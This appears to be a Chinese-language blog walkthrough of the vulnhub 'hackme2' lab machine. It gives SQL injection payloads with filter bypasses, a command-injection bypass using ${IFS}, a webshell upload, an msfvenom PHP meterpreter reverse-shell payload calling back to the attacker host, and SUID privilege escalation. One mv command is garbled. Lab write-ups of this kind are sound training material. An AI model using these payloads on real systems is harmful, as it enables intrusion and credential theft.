vulnbuh-hackme2

vulnbuh-hackme2靶机

环境

目标主机ip 192.168.10.147

攻击机 kali 192.168.143

​ 物理机 windows

信息收集

对目标主机进行端口扫描

nmap -sS -A 192.168.10.147
在这里插入图片描述

开放端口 22和80

访问目标主机80
在这里插入图片描述

一个登录页面

注册并登录
在这里插入图片描述
在这里插入图片描述

一个搜索框
在这里插入图片描述

直接点击搜索 显示book

使用书名搜索 OSINT
在这里插入图片描述
搜索框 可能存在sql注入漏洞,尝试验证一下

输入 OSINT’
在这里插入图片描述
没有任何回显

添加过滤

OSINT’ – + – +无回显

OSINT’ # # 返回正常搜索结果
在这里插入图片描述

存在sql注入漏洞

漏洞利用

已经验证存在sql注入漏洞了,继续去利用这个漏洞

使用order by 猜测字段

OSINT’ order by 3#
在这里插入图片描述

并无任何回显,猜测可能有过滤,

fuzz一波

发现过滤了空格

使用注释绕过空格过滤

OSINT'order/**/by/**/1#
在这里插入图片描述

判断字段数为3

使用union 联合查询

查看回显

OSINT'union/**/select/**/1,2,3#
在这里插入图片描述
在这里插入图片描述

常规操作,爆库,爆表,爆字段

OSINT'union/**/select/**/database(),2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#
在这里插入图片描述

OSINT'union/**/select/**/database(),2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'#
在这里插入图片描述

OSINT'union/**/select/**/user,pasword,3/**/from/**/users#
在这里插入图片描述
在这里插入图片描述

找到一个叫superadmin的用户

解密码
在这里插入图片描述
得到用户名和密码

superadmin/Uncrackable

使用 superadmin登录
在这里插入图片描述
有个文件上传点

尝试上传一句话木马
shell.jpg能成功上传,但是没有回显上传点
在这里插入图片描述
在这里插入图片描述

只能上传 jpg png gif 文件

暂时利用不起来
在这里插入图片描述
两个 查询框
这种框 一般尝试 命令执行或者是跨站脚本
在这里插入图片描述

输入 1+1 和2+2
在这里插入图片描述

我们关注到 2+2 被执行成了 4

这里可能存在 命令执行
万能phpinfo 打一下
在这里插入图片描述
在这里插入图片描述

回显phpinfo 存在 命令执行漏洞
在这里插入图片描述

尝试读出welcomeadmin.php 源码
在这里插入图片描述
关注到这里 空格被过滤了

我们尝试使用 < 来绕过空格
${IFS} 也可以
在这里插入图片描述
通过阅读源码找到 文件上传的 路径
访问我们刚刚上传的图片
在这里插入图片描述
图片存在但是并未解析成php

利用命令执行漏洞 将图片改为shell.php

system(‘mv I F S / v a r / w w w / h t m l / u p l o a d s / y e a r 2020 / s h e l l . j p g {IFS}/var/www/html/uploads/year2020/shell.jpg IFS/var/www/html/uploads/year2020/shell.jpg{IFS}/var/www/html/uploads/year2020/shell.php’)
在这里插入图片描述
在这里插入图片描述

使用蚁剑连接
在这里插入图片描述
在这里插入图片描述
成功getshell

访问/root的时候提示path not found or no permission 没有权限
在这里插入图片描述

需要进行提权

权限提升

使用msf生成php木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.143 -f raw >/root/test.php
在这里插入图片描述
使用蚁剑上传到目标主机
在这里插入图片描述
msf开启监听

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.10.143

msf6 exploit(multi/handler) > run
在这里插入图片描述

访问我们的test.php页面
在这里插入图片描述
在这里插入图片描述

成功获取meterpreter
在这里插入图片描述

查找suid 文件

find / -perm -4000 -type f 2>/dev/null
在这里插入图片描述

/home/legacy/touchmenot 这个文件可疑

执行文件
在这里插入图片描述
查看当前用户,已经是root

修改掉root的密码
在这里插入图片描述

登录主机

在这里插入图片描述
成功以root权限进入目标主机

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值